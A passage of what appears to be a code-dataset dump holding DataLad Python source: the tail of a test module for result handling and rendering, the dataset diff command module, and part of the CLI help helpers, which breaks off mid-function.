doc1)\n assert_in(\"return value behavior\", doc1)\n assert_in(\"dictionary is passed\", doc1)\n\n # test eval_results is able to determine the call, a method of which it is\n # decorating:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n Dataset('/does/not/matter').fake_command(3)\n assert_in(\"Determined class of decorated function: {}\"\n \"\".format(TestUtils().__class__), cml.out)\n\n # test results:\n result = TestUtils().__call__(2)\n assert_equal(len(list(result)), 2)\n result = Dataset('/does/not/matter').fake_command(3)\n assert_equal(len(list(result)), 3)\n\n # test absent side-effect of popping eval_defaults\n kwargs = dict(return_type='list')\n TestUtils().__call__(2, **kwargs)\n assert_equal(list(kwargs), ['return_type'])\n\n # test signature:\n from datalad.utils import getargspec\n assert_equal(getargspec(Dataset.fake_command)[0],\n ['number', 'dataset', 'result_fn'])\n assert_equal(getargspec(TestUtils.__call__)[0],\n ['number', 'dataset', 'result_fn'])\n\n\ndef test_result_filter():\n # ensure baseline without 
filtering\n assert_equal(\n [r['somekey'] for r in TestUtils().__call__(4)],\n [0, 1, 2, 3])\n # test two functionally equivalent ways to filter results\n # 1. Constraint-based -- filter by exception\n # we have a full set of AND and OR operators for this\n # 2. custom filer function -- filter by boolean return value\n for filt in (\n EnsureKeyChoice('somekey', (0, 2)),\n lambda x: x['somekey'] in (0, 2)):\n assert_equal(\n [r['somekey'] for r in TestUtils().__call__(\n 4,\n result_filter=filt)],\n [0, 2])\n # constraint returns full dict\n assert_dict_equal(\n TestUtils().__call__(\n 4,\n result_filter=filt)[-1],\n {'action': 'off', 'path': 'some', 'status': 'ok', 'somekey': 2})\n\n # test more sophisticated filters that actually get to see the\n # API call's kwargs\n def greatfilter(res, **kwargs):\n assert_equal(kwargs.get('dataset', 'bob'), 'awesome')\n return True\n TestUtils().__call__(4, dataset='awesome', result_filter=greatfilter)\n\n def sadfilter(res, **kwargs):\n assert_equal(kwargs.get('dataset', 'bob'), None)\n return True\n TestUtils().__call__(4, result_filter=sadfilter)\n\n\n@with_tree({k: v for k, v in demo_hierarchy.items() if k in ['a', 'd']})\n@with_tempfile(mkdir=True)\ndef test_discover_ds_trace(path=None, otherdir=None):\n ds = make_demo_hierarchy_datasets(\n path,\n {k: v for k, v in demo_hierarchy.items() if k in ['a', 'd']})\n a = opj(ds.path, 'a')\n aa = opj(a, 'aa')\n d = opj(ds.path, 'd')\n db = opj(d, 'db')\n # we have to check whether we get the correct hierarchy, as the test\n # subject is also involved in this\n assert_true(exists(opj(db, 'file_db')))\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # now two datasets which are not available locally, but we\n # know about them (e.g. from metadata)\n dba = opj(db, 'sub', 'dba')\n dbaa = opj(dba, 'subsub', 'dbaa')\n for input, eds, goal in (\n ([], None, {}),\n ([ds.path], None, {}),\n ([otherdir], None, {}),\n ([opj(ds.path, 'nothere')], None, {}),\n ([opj(d, 'nothere')], None, {}),\n ([opj(db, 'nothere')], None, {}),\n ([a], None,\n {ds.path: set([a])}),\n ([aa, a], None,\n {ds.path: set([a]), a: set([aa])}),\n ([db], None,\n {ds.path: set([d]), d: set([db])}),\n ([opj(db, 'file_db')], None,\n {ds.path: set([d]), d: set([db])}),\n # just a regular non-existing path\n ([dba], None, {}),\n # but if we inject this knowledge it must come back out\n # as the child of the closest existing dataset\n ([dba], [dba],\n {ds.path: set([d]), d: set([db]), db: set([dba])}),\n # regardless of the depth\n ([dbaa], [dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dbaa])}),\n ([dba, dbaa], [dba, dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dba, dbaa])}),\n # we can simply add existing and non-existing datasets to the\n # include list get the desired result\n ([d, dba, dbaa], [d, dba, dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dba, dbaa])}),\n ):\n spec = {}\n discover_dataset_trace_to_targets(ds.path, input, [], spec, includeds=eds)\n assert_dict_equal(spec, goal)\n\n\n@contextmanager\ndef _swallow_outputs(isatty=True):\n with swallow_outputs() as cmo:\n stdout = cmo.handles[0]\n stdout.isatty = lambda: isatty\n yield cmo\n\n\ndef test_utils_suppress_similar():\n tu = TestUtils()\n\n # Check suppression boundary for straight chain of similar\n # messages.\n\n # yield test results immediately to make test run fast\n sleep_dur = 0.0\n\n def n_foo(number):\n for i in range(number):\n yield dict(action=\"foo\",\n status=\"ok\",\n path=\"path{}\".format(i))\n sleep(sleep_dur)\n\n\n with 
_swallow_outputs() as cmo:\n cmo.isatty = lambda: True\n list(tu(9, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path8\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(10, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path9\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(11, result_fn=n_foo, result_renderer=\"default\"))\n assert_not_in(\"path10\", cmo.out)\n assert_re_in(r\"[^-0-9]1 .* suppressed\", cmo.out, match=False)\n\n with _swallow_outputs() as cmo:\n # for this one test yield results slightly slower than 2Hz\n # such that we can see each individual suppression message\n # and no get caught by the rate limiter\n sleep_dur = 0.51\n list(tu(13, result_fn=n_foo, result_renderer=\"default\"))\n assert_not_in(\"path10\", cmo.out)\n # We see an update for each result.\n assert_re_in(r\"1 .* suppressed\", cmo.out, match=False)\n assert_re_in(r\"2 .* suppressed\", cmo.out, match=False)\n assert_re_in(r\"3 .* suppressed\", cmo.out, match=False)\n\n # make tests run fast again\n sleep_dur = 0.0\n\n with _swallow_outputs(isatty=False) as cmo:\n list(tu(11, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n\n # Check a chain of similar messages, split in half by a distinct one.\n\n def n_foo_split_by_a_bar(number):\n half = number // 2 - 1\n for i in range(number):\n yield dict(action=\"foo\",\n status=\"ok\",\n path=\"path{}\".format(i))\n if i == half:\n yield dict(action=\"bar\",\n status=\"ok\",\n path=\"path\")\n\n with _swallow_outputs() as cmo:\n list(tu(20, result_fn=n_foo_split_by_a_bar, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n assert_in(\"path19\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(21, result_fn=n_foo_split_by_a_bar, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n assert_not_in(\"path20\", cmo.out)\n assert_re_in(\"[^-0-9]1 .* suppressed\", cmo.out, match=False)\n\n\nclass TestUtils2(Interface):\n # result_renderer = custom_renderer\n _params_ = dict(\n number=Parameter(\n args=(\"--path\",),\n constraints=EnsureStr() | EnsureNone()),\n )\n @staticmethod\n @eval_results\n def __call__(path=None):\n def logger(msg, *args):\n return msg % args\n if path:\n # we will be testing for path %s\n message = (\"all good %s\", \"my friend\")\n else:\n message = (\"kaboom %s %s\", \"greedy\")\n yield get_status_dict(\n action=\"test\",\n status=\"ok\",\n message=message,\n logger=logger,\n path=path or ''\n )\n\n\ndef test_incorrect_msg_interpolation():\n with assert_raises(TypeError) as cme:\n TestUtils2().__call__()\n # this must be our custom exception\n assert_re_in(\"Failed to render.*kaboom.*not enough arguments\", str(cme.value))\n\n # there should be no exception if reported in the record path contains %\n TestUtils2().__call__(\"%eatthis\")\n\n\nclass CustomResultRenderer(Interface):\n result_renderer = \"tailored\"\n _params_ = dict(x=Parameter(args=(\"x\",)))\n\n @staticmethod\n @eval_results\n def __call__(x):\n yield get_status_dict(action=\"foo\", status=\"ok\", message=\"message\",\n x=x, logger=lgr)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n # This custom result renderer gets the command's keyword arguments and\n # all of the common ones too, even those not explicitly specified.\n assert_in(\"x\", kwargs)\n assert_in(\"on_failure\", kwargs)\n assert_in(\"result_filter\", kwargs)\n 
assert_in(\"result_renderer\", kwargs)\n\n\ndef test_custom_result_renderer():\n list(CustomResultRenderer().__call__(\"arg\"))\n\n\nclass CustomSummary(Interface):\n result_renderer = \"tailored\"\n _params_ = dict(x=Parameter(args=(\"x\",)))\n\n @staticmethod\n @eval_results\n def __call__(x):\n for action, status in [(\"test.one\", \"ok\"),\n (\"test.two\", \"ok\"),\n (\"test.two\", \"notneeded\"),\n (\"test.one\", \"ok\")]:\n yield get_status_dict(action=action, status=status,\n message=\"message\", x=x, logger=lgr)\n\n @staticmethod\n def custom_result_summary_renderer(*args):\n if getattr(CustomSummary, \"custom_result_summary_renderer_pass_summary\",\n False):\n action_summary = args[1]\n assert_equal(action_summary[\"test.one\"], {\"ok\": 2})\n assert_equal(action_summary[\"test.two\"], {\"ok\": 1, \"notneeded\": 1})\n results = args[0]\n assert_equal(len(results), 4)\n assert_result_count(results, 2, action=\"test.one\", status=\"ok\")\n assert_result_count(results, 1, action=\"test.two\", status=\"ok\")\n assert_result_count(results, 1, action=\"test.two\", status=\"notneeded\")\n\n\ndef test_custom_result_summary_renderer():\n list(CustomSummary().__call__(\"arg\"))\n try:\n CustomSummary.custom_result_summary_renderer_pass_summary = True\n list(CustomSummary().__call__(\"arg\"))\n finally:\n del CustomSummary.custom_result_summary_renderer_pass_summary\n" }, { "alpha_fraction": 0.5655592083930969, "alphanum_fraction": 0.5664459466934204, "avg_line_length": 36.75893020629883, "blob_id": "b66d0600a01397026dc074a2dd5ca482b5fe61d6", "content_id": "2a2a5295b35ac6c93f4d4e3e732bce58ac2664a4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16916, "license_type": "permissive", "max_line_length": 87, "num_lines": 448, "path": "/datalad/core/local/diff.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Report differences between two states of a dataset (hierarchy)\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os.path as op\nfrom datalad.utils import (\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n path_under_rev_dataset,\n)\n\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\n\nfrom datalad.core.local.status import (\n Status,\n _common_diffstatus_params,\n)\nfrom datalad.support.exceptions import (\n InvalidGitReferenceError,\n)\n\nlgr = logging.getLogger('datalad.core.local.diff')\n\n\n@build_doc\nclass Diff(Interface):\n \"\"\"Report differences between two states of a dataset (hierarchy)\n\n The two to-be-compared states are given via the --from and --to options.\n These state identifiers are evaluated in the context of the (specified\n or detected) dataset. 
In the case of a recursive report on a dataset\n hierarchy, corresponding state pairs for any subdataset are determined\n from the subdataset record in the respective superdataset. Only changes\n recorded in a subdataset between these two states are reported, and so on.\n\n Any paths given as additional arguments will be used to constrain the\n difference report. As with Git's diff, it will not result in an error when\n a path is specified that does not exist on the filesystem.\n\n Reports are very similar to those of the `status` command, with the\n distinguished content types and states being identical.\n \"\"\"\n # make the custom renderer the default one, as the global default renderer\n # does not yield meaningful output for this command\n result_renderer = 'tailored'\n\n _params_ = dict(\n _common_diffstatus_params,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path to constrain the report to\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n fr=Parameter(\n args=(\"-f\", \"--from\",),\n dest='fr',\n metavar=\"REVISION\",\n doc=\"\"\"original state to compare to, as given by any identifier\n that Git understands.\"\"\",\n constraints=EnsureStr()),\n to=Parameter(\n args=(\"-t\", \"--to\",),\n metavar=\"REVISION\",\n doc=\"\"\"state to compare against the original state, as given by\n any identifier that Git understands. If none is specified,\n the state of the working tree will be compared.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n )\n\n _examples_ = [\n dict(text=\"Show unsaved changes in a dataset\",\n code_py=\"diff()\",\n code_cmd=\"datalad diff\"),\n dict(text=\"Compare a previous dataset state identified by shasum \"\n \"against current worktree\",\n code_py=\"diff(fr='SHASUM')\",\n code_cmd=\"datalad diff --from <SHASUM>\"),\n dict(text=\"Compare two branches against each other\",\n code_py=\"diff(fr='branch1', to='branch2')\",\n code_cmd=\"datalad diff --from branch1 --to branch2\"),\n dict(text=\"Show unsaved changes in the dataset and potential subdatasets\",\n code_py=\"diff(recursive=True)\",\n code_cmd=\"datalad diff -r\"),\n dict(text=\"Show unsaved changes made to a particular file\",\n code_py=\"diff(path='path/to/file')\",\n code_cmd=\"datalad diff <path/to/file>\"),\n ]\n\n @staticmethod\n @datasetmethod(name='diff')\n @eval_results\n def __call__(\n path=None,\n *,\n fr='HEAD',\n to=None,\n dataset=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None):\n yield from diff_dataset(\n dataset=dataset,\n fr=ensure_unicode(fr),\n to=ensure_unicode(to),\n constant_refs=False,\n path=path,\n annex=annex,\n untracked=untracked,\n recursive=recursive,\n recursion_limit=recursion_limit)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs): # pragma: more cover\n Status.custom_result_renderer(res, **kwargs)\n\n\ndef diff_dataset(\n dataset,\n fr,\n to,\n constant_refs,\n path=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None,\n reporting_order='depth-first',\n datasets_only=False,\n):\n \"\"\"Internal helper to diff a dataset\n\n Parameters\n ----------\n dataset : Dataset\n Dataset to perform the diff on. `fr` and `to` parameters are interpreted\n in the context of this dataset.\n fr : str\n Commit-ish to compare from.\n to : str\n Commit-ish to compare to.\n constant_refs : bool\n If True, `fr` and `to` will be passed on unmodified to diff operations\n on subdatasets. 
This can be useful with symbolic references like tags\n to report subdataset changes independent of superdataset changes.\n If False, `fr` and `to` will be translated to the subdataset commit-ish\n that match the given commit-ish in the superdataset.\n path : Path-like, optional\n Paths to constrain the diff to (see main diff() command).\n annex : str, optional\n Reporting mode for annex properties (see main diff() command).\n untracked : str, optional\n Reporting mode for untracked content (see main diff() command).\n recursive : bool, optional\n Flag to enable recursive operation (see main diff() command).\n recursion_limit : int, optional\n Recursion limit (see main diff() command).\n reporting_order : {'depth-first', 'breadth-first', 'bottom-up'}, optional\n By default, subdataset content records are reported after the record\n on the subdataset's submodule in a superdataset (depth-first).\n Alternatively, report all superdataset records first, before reporting\n any subdataset content records (breadth-first). Both 'depth-first'\n and 'breadth-first' both report dataset content before considering\n subdatasets. Alternative 'bottom-up' mode is similar to 'depth-first'\n but dataset content is reported after reporting on subdatasets.\n datasets_only : bool, optional\n Consider only changes to (sub)datasets but limiting operation only to\n paths of subdatasets.\n Note: ATM incompatible with explicit specification of `path`.\n\n Yields\n ------\n dict\n DataLad result records.\n \"\"\"\n if reporting_order not in ('depth-first', 'breadth-first', 'bottom-up'):\n raise ValueError('Unknown reporting order: {}'.format(reporting_order))\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='report difference')\n\n # we cannot really perform any sorting of paths into subdatasets\n # or rejecting paths based on the state of the filesystem, as\n # we need to be able to compare with states that are not represented\n # in the worktree (anymore)\n if path:\n if datasets_only:\n raise NotImplementedError(\n \"Analysis of provided paths in datasets_only mode is not implemented\"\n )\n\n ps = []\n # sort any path argument into the respective subdatasets\n for p in sorted(ensure_list(path)):\n # it is important to capture the exact form of the\n # given path argument, before any normalization happens\n # distinguish rsync-link syntax to identify\n # a dataset as whole (e.g. 'ds') vs its\n # content (e.g. 'ds/')\n # special case is the root dataset, always report its content\n # changes\n orig_path = str(p)\n resolved_path = resolve_path(p, dataset)\n p = \\\n resolved_path, \\\n orig_path.endswith(op.sep) or resolved_path == ds.pathobj\n str_path = str(p[0])\n root = get_dataset_root(str_path)\n if root is None:\n # no root, not possibly underneath the refds\n yield dict(\n action='status',\n path=str_path,\n refds=ds.path,\n status='error',\n message='path not underneath this dataset',\n logger=lgr)\n continue\n if path_under_rev_dataset(ds, str_path) is None:\n # nothing we support handling any further\n # there is only a single refds\n yield dict(\n path=str_path,\n refds=ds.path,\n action='diff',\n status='error',\n message=(\n \"dataset containing given paths is not underneath \"\n \"the reference dataset %s: %s\",\n ds, str_path),\n logger=lgr,\n )\n continue\n\n ps.append(p)\n path = ps\n\n # TODO we might want to move away from the single-pass+immediate-yield\n # paradigm for this command. 
If we gather all information first, we\n # could do post-processing and detect when a file (same gitsha, or same\n # key) was copied/moved from another dataset. Another command (e.g.\n # save) could act on this information and also move/copy\n # availability information or at least enhance the respective commit\n # message with cross-dataset provenance info\n\n # cache to help avoid duplicate status queries\n content_info_cache = {}\n for res in _diff_ds(\n ds,\n fr,\n to,\n constant_refs,\n recursion_limit\n if recursion_limit is not None and recursive\n else -1 if recursive else 0,\n # TODO recode paths to repo path reference\n origpaths=None if not path else dict(path),\n untracked=untracked,\n annexinfo=annex,\n cache=content_info_cache,\n order=reporting_order,\n datasets_only=datasets_only,\n ):\n res.update(\n refds=ds.path,\n logger=lgr,\n action='diff',\n )\n yield res\n\n\ndef _diff_ds(ds, fr, to, constant_refs, recursion_level, origpaths, untracked,\n annexinfo, cache, order='depth-first', datasets_only=False):\n if not ds.is_installed():\n # asked to query a subdataset that is not available\n lgr.debug(\"Skip diff of unavailable subdataset: %s\", ds)\n return\n\n repo = ds.repo\n repo_path = repo.pathobj\n if datasets_only:\n assert not origpaths # protected above with NotImplementedError\n paths = dict(\n (sds.pathobj.relative_to(ds.pathobj), False)\n for sds in ds.subdatasets(\n recursive=False,\n state='present',\n result_renderer='disabled',\n result_xfm='datasets',\n )\n )\n if not paths:\n # no subdatasets, nothing todo???\n return\n else:\n # filter and normalize paths that match this dataset before passing them\n # onto the low-level query method\n paths = None if origpaths is None \\\n else dict(\n (repo_path / p.relative_to(ds.pathobj), goinside)\n for p, goinside in origpaths.items()\n if ds.pathobj in p.parents or (p == ds.pathobj and goinside)\n )\n paths_arg = list(paths) if paths else None\n try:\n lgr.debug(\"Diff %s from '%s' to '%s'\", ds, fr, to)\n diff_state = repo.diffstatus(\n fr,\n to,\n paths=paths_arg,\n untracked=untracked,\n eval_submodule_state='full' if to is None else 'commit',\n _cache=cache)\n except InvalidGitReferenceError as e:\n yield dict(\n path=ds.path,\n status='impossible',\n message=str(e),\n )\n return\n\n if annexinfo and hasattr(repo, 'get_content_annexinfo'):\n # this will amend `diff_state`\n repo.get_content_annexinfo(\n paths=paths_arg,\n init=diff_state,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=to)\n # if `fr` is None, we compare against a preinit state, and\n # a get_content_annexinfo on that state doesn't get us anything new\n if fr and fr != to:\n repo.get_content_annexinfo(\n paths=paths_arg,\n init=diff_state,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=fr,\n key_prefix=\"prev_\")\n\n # potentially collect subdataset diff call specs for the end\n # (if order == 'breadth-first')\n ds_diffs = []\n subds_diffcalls = []\n for path, props in diff_state.items():\n pathinds = str(ds.pathobj / path.relative_to(repo_path))\n path_rec = dict(\n props,\n path=pathinds,\n # report the dataset path rather than the repo path to avoid\n # realpath/symlink issues\n parentds=ds.path,\n status='ok',\n )\n if order in ('breadth-first', 'depth-first'):\n yield path_rec\n elif order == 'bottom-up':\n ds_diffs.append(path_rec)\n else:\n raise ValueError(order)\n # for a dataset we need to decide whether to dive in, or not\n if props.get('type', None) == 'dataset' and (\n # subdataset path was given in 
rsync-style 'ds/'\n (paths and paths.get(path, False))\n # there is still sufficient recursion level left\n or recursion_level != 0\n # no recursion possible anymore, but one of the given\n # path arguments is in this subdataset\n or (recursion_level == 0\n and paths\n and any(path in p.parents for p in paths))):\n subds_state = props.get('state', None)\n if subds_state in ('clean', 'deleted'):\n # no need to look into the subdataset\n continue\n elif subds_state in ('added', 'modified'):\n # dive\n subds = Dataset(pathinds)\n call_args = (\n subds,\n # from before time or from the reported state\n fr if constant_refs\n else None\n if subds_state == 'added'\n else props['prev_gitshasum'],\n # to the last recorded state, or the worktree\n None if to is None\n else to if constant_refs\n else props['gitshasum'],\n constant_refs,\n )\n call_kwargs = dict(\n # subtract on level on the way down, unless the path\n # args instructed to go inside this subdataset\n recursion_level=recursion_level\n # protect against dropping below zero (would mean unconditional\n # recursion)\n if not recursion_level or (paths and paths.get(path, False))\n else recursion_level - 1,\n origpaths=origpaths,\n untracked=untracked,\n annexinfo=annexinfo,\n cache=cache,\n order=order,\n datasets_only=datasets_only,\n )\n if order in ('depth-first', 'bottom-up'):\n yield from _diff_ds(*call_args, **call_kwargs)\n elif order == 'breadth-first':\n subds_diffcalls.append((call_args, call_kwargs))\n else:\n raise ValueError(order)\n else:\n raise RuntimeError(\n \"Unexpected subdataset state '{}'. That sucks!\".format(\n subds_state))\n # deal with staged ds diffs (for bottom-up)\n for rec in ds_diffs:\n yield rec\n # deal with staged subdataset diffs (for breadth-first)\n for call_args, call_kwargs in subds_diffcalls:\n yield from _diff_ds(*call_args, **call_kwargs)\n" }, { "alpha_fraction": 0.5681620240211487, "alphanum_fraction": 0.5726189613342285, "avg_line_length": 36.25992965698242, "blob_id": "ebd49547e2bb2d06c78d58b9b32a0385e7e6822f", "content_id": "7530099921ade335c01e23f30642e52f689725e5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10321, "license_type": "permissive", "max_line_length": 94, "num_lines": 277, "path": "/datalad/cli/helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"CONFIRMED TO BE UNIQUE TO THE CLI\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport argparse\nimport os\nimport re\nimport sys\nimport gzip\nimport textwrap\nfrom textwrap import wrap\n\nfrom datalad import __version__\n# delay?\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.ui.utils import get_console_width\nfrom datalad.utils import is_interactive\n\nfrom platformdirs import AppDirs\n\ndirs = AppDirs(\"datalad\", \"datalad.org\")\n\n\nfrom logging import getLogger\nlgr = getLogger('datalad.cli.helpers')\n\n\nclass HelpAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n # Lets use the manpage on mature systems but only for subcommands --\n # --help should behave 
similar to how git does it:\n # regular --help for \"git\" but man pages for specific commands.\n # It is important since we do discover all subcommands from entry\n # points at run time and thus any static manpage would like be out of\n # date\n interactive = is_interactive()\n if interactive \\\n and option_string == '--help' \\\n and ' ' in parser.prog: # subcommand\n self._try_manpage(parser)\n if option_string == '-h':\n helpstr = self._get_short_help(parser)\n else:\n helpstr = self._get_long_help(parser)\n\n # normalize capitalization to what we \"always\" had\n helpstr = f'Usage:{helpstr[6:]}'\n\n if interactive and option_string == '--help':\n import pydoc\n pydoc.pager(helpstr)\n else:\n print(helpstr)\n sys.exit(0)\n\n def _get_long_help(self, parser):\n helpstr = parser.format_help()\n if ' ' in parser.prog: # subcommand\n # in case of a subcommand there is no need to pull the\n # list of top-level subcommands\n return helpstr\n helpstr = re.sub(\n r'^[uU]sage: .*?\\n\\s*\\n',\n 'Usage: datalad [global-opts] command [command-opts]\\n\\n',\n helpstr,\n flags=re.MULTILINE | re.DOTALL)\n # split into preamble and options\n preamble = []\n options = []\n in_options = False\n for line in helpstr.splitlines():\n if line in ('options:', 'optional arguments:'):\n in_options = True\n continue\n (options if in_options else preamble).append(line)\n\n intf = self._get_all_interfaces()\n from datalad.interface.base import (\n get_cmd_doc,\n load_interface,\n )\n from .interface import (\n get_cmdline_command_name,\n alter_interface_docs_for_cmdline,\n )\n preamble = get_description_with_cmd_summary(\n # produce a mapping of command groups to\n # [(cmdname, description), ...]\n {\n i[0]: [(\n get_cmdline_command_name(c),\n # alter_interface_docs_for_cmdline is only needed, because\n # some commands use sphinx markup in their summary line\n # stripping that takes 10-30ms for a typical datalad\n # installation with some extensions\n alter_interface_docs_for_cmdline(\n # we only take the first line\n get_cmd_doc(\n # we must import the interface class\n # this will engage @build_doc -- unavoidable right\n # now\n load_interface(c)\n ).split('\\n', maxsplit=1)[0]))\n for c in i[2]]\n for i in intf\n },\n intf,\n '\\n'.join(preamble),\n )\n return '{}\\n\\n*Global options*\\n{}\\n'.format(\n preamble,\n '\\n'.join(options),\n )\n\n def _get_short_help(self, parser):\n usage = parser.format_usage()\n hint = \"Use '--help' to get more comprehensive information.\"\n if ' ' in parser.prog: # subcommand\n # in case of a subcommand there is no need to pull the\n # list of top-level subcommands\n return f\"{usage}\\n{hint}\"\n\n # get the list of commands and format them like\n # argparse would present subcommands\n commands = get_commands_from_groups(self._get_all_interfaces())\n indent = usage.splitlines()[-1]\n indent = indent[:-len(indent.lstrip())] + ' '\n usage += f'{indent[1:]}{{'\n usage += '\\n'.join(wrap(\n ', '.join(sorted(c.strip() for c in commands)),\n break_on_hyphens=False,\n subsequent_indent=indent))\n usage += f'}}\\n{indent[1:]}...\\n'\n return f\"{usage}\\n{hint}\"\n\n def _get_all_interfaces(self):\n # load all extensions and command specs\n # this does not fully tune all the command docs\n from datalad.interface.base import get_interface_groups\n interface_groups = get_interface_groups()\n add_entrypoints_to_interface_groups(interface_groups)\n return interface_groups\n\n def _try_manpage(self, parser):\n try:\n import subprocess\n # get the datalad manpage to use\n manfile = 
os.environ.get('MANPATH', '/usr/share/man') \\\n + '/man1/{0}.1.gz'.format(parser.prog.replace(' ', '-'))\n # extract version field from the manpage\n if not os.path.exists(manfile):\n raise IOError(\"manfile is not found\")\n with gzip.open(manfile) as f:\n man_th = [line for line in f if line.startswith(b\".TH\")][0]\n man_version = man_th.split(b' ')[-1].strip(b\" '\\\"\\t\\n\").decode('utf-8')\n\n # don't show manpage if man_version not equal to current datalad_version\n if __version__ != man_version:\n raise ValueError\n subprocess.check_call(\n 'man %s 2> /dev/null' % manfile,\n shell=True)\n sys.exit(0)\n except (subprocess.CalledProcessError, IOError, OSError, IndexError, ValueError) as e:\n ce = CapturedException(e)\n lgr.debug(\"Did not use manpage since %s\", ce)\n\n\nclass LogLevelAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n from datalad.log import LoggerHelper\n LoggerHelper().set_level(level=values)\n\n\n#\n# Some logic modules extracted from main.py to de-spagetify\n#\n\n\ndef add_entrypoints_to_interface_groups(interface_groups):\n from datalad.support.entrypoints import iter_entrypoints\n for name, _, spec in iter_entrypoints('datalad.extensions', load=True):\n if len(spec) < 2 or not spec[1]:\n # entrypoint identity was logged by the iterator already\n lgr.debug('Extension does not provide a command suite')\n continue\n interface_groups.append((name, spec[0], spec[1]))\n\n\ndef get_commands_from_groups(groups):\n \"\"\"Get a dictionary of command: interface_spec\"\"\"\n from .interface import get_cmdline_command_name\n return {\n get_cmdline_command_name(_intfspec): _intfspec\n for _, _, _interfaces in groups\n for _intfspec in _interfaces\n }\n\n\ndef _fix_datalad_ri(s):\n \"\"\"Fixup argument if it was a DataLadRI and had leading / removed\n\n See gh-2643\n \"\"\"\n if s.startswith('//') and (len(s) == 2 or (len(s) > 2 and s[2] != '/')):\n lgr.info(\n \"Changing %s back to /%s as it was probably changed by MINGW/MSYS, \"\n \"see http://www.mingw.org/wiki/Posix_path_conversion\", s, s)\n return \"/\" + s\n return s\n\n\ndef get_description_with_cmd_summary(grp_short_descriptions, interface_groups,\n parser_description):\n from .interface import (\n dedent_docstring,\n )\n from datalad.interface.base import get_cmd_summaries\n lgr.debug(\"Generating detailed description for the parser\")\n\n console_width = get_console_width()\n cmd_summary = get_cmd_summaries(grp_short_descriptions, interface_groups,\n width=console_width)\n # we need one last formal section to not have the trailed be\n # confused with the last command group\n cmd_summary.append('\\n*General information*\\n')\n detailed_description = '{}{}\\n{}\\n'.format(\n parser_description,\n '\\n'.join(cmd_summary),\n textwrap.fill(dedent_docstring(\"\"\"\\\n Detailed usage information for individual commands is\n available via command-specific --help, i.e.:\n datalad <command> --help\"\"\"),\n console_width - 5,\n initial_indent='',\n subsequent_indent=''))\n return detailed_description\n\n\ndef _parse_overrides_from_cmdline(cmdlineargs):\n \"\"\"parse config overrides provided in command line\n\n Might exit(3) the entire process if value is not assigned\"\"\"\n # this expression is deliberately loose as gitconfig offers\n # quite some flexibility -- this is just meant to catch stupid\n # errors: we need a section, a variable, and a value at minimum\n # otherwise we break our own config parsing helpers\n # https://github.com/datalad/datalad/issues/3451\n 
